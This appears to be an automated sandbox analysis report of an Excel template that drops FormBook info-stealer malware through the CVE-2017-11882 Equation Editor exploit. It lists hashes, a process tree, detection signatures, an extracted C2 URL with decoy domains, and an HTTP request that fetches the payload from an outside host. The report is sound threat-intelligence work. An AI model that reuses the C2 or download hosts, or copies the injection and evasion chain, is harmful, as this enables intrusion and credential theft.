Windows Analysis Report New_1007572_021.xltx

Overview

General Information

Sample Name: New_1007572_021.xltx
Analysis ID: 458850
MD5: 427e80f30505c596c822c141283a5a70
SHA1: d910f9e9ecf2cb8c68f8fca4121bac4bad757a37
SHA256: d1acfa41b1e1fbc076b41547954e6615132256983b0315c50f8dbb97a0399fbd
Tags: xlsx, xltx
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2624 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2384 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • tynex.exe (PID: 2216 cmdline: C:\Users\Public\tynex.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
      • tynex.exe (PID: 3000 cmdline: C:\Users\user\AppData\Local\Temp\tynex.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
        • FB_BFF5.tmp.exe (PID: 2748 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe' MD5: 74BAFB3E707C7B0C63938AC200F99C7F)
        • FB_C479.tmp.exe (PID: 2724 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe' MD5: 48ECE2CA39A9EAE7FCED7418CF071D46)
          • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • cscript.exe (PID: 2248 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
              • cmd.exe (PID: 1244 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threat name: FormBook

{"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}

Yara Overview

Dropped Files

Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group

Memory Dumps

Source | Rule | Description | Author
00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author
7.0.FB_C479.tmp.exe.1340000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.0.FB_C479.tmp.exe.1340000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
7.0.FB_C479.tmp.exe.1340000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
4.2.tynex.exe.36294d0.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.tynex.exe.36294d0.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 160.153.129.234, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2384, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2384, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\Public\tynex.exe, CommandLine: C:\Users\Public\tynex.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\tynex.exe, NewProcessName: C:\Users\Public\tynex.exe, OriginalFileName: C:\Users\Public\tynex.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2384, ProcessCommandLine: C:\Users\Public\tynex.exe, ProcessId: 2216
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\Public\tynex.exe, CommandLine: C:\Users\Public\tynex.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\tynex.exe, NewProcessName: C:\Users\Public\tynex.exe, OriginalFileName: C:\Users\Public\tynex.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2384, ProcessCommandLine: C:\Users\Public\tynex.exe, ProcessId: 2216

Jbx Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe; ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\tynex.exe; ReversingLabs: Detection: 28%
Source: C:\Users\Public\tynex.exe; ReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: New_1007572_021.xltx; ReversingLabs: Detection: 39%
Yara detected FormBook
Source: Yara match; File source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tynex.exe; Joe Sandbox ML: detected
Source: C:\Users\Public\tynex.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Joe Sandbox ML: detected
Source: 7.0.FB_C479.tmp.exe.1340000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.tynex.exe.36294d0.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.FB_C479.tmp.exe.1340000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.tynex.exe.39186d0.6.unpack; Avira: Label: TR/Crypt.XPACK.Gen2
Source: 5.2.tynex.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.tynex.exe.276b818.2.unpack; Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\tynex.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\tynex.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb; source: FB_C479.tmp.exe, cscript.exe
Source: Binary string: cscript.pdbN; source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp
Source: Binary string: cscript.pdb; source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Code function: 4x nop then pop esi; 7_2_0135727D
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Code function: 4x nop then pop edi; 7_2_01357D7B
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 4x nop then pop esi; 9_2_0008727D
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 4x nop then pop edi; 9_2_00087D7B

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.domoexpra.club/cg53/
Source: Joe Sandbox View; ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: global traffic; HTTP traffic detected:
    GET /Di4/New_1007572_021.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: inter-trading-service.com
    Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30DB366F.jpg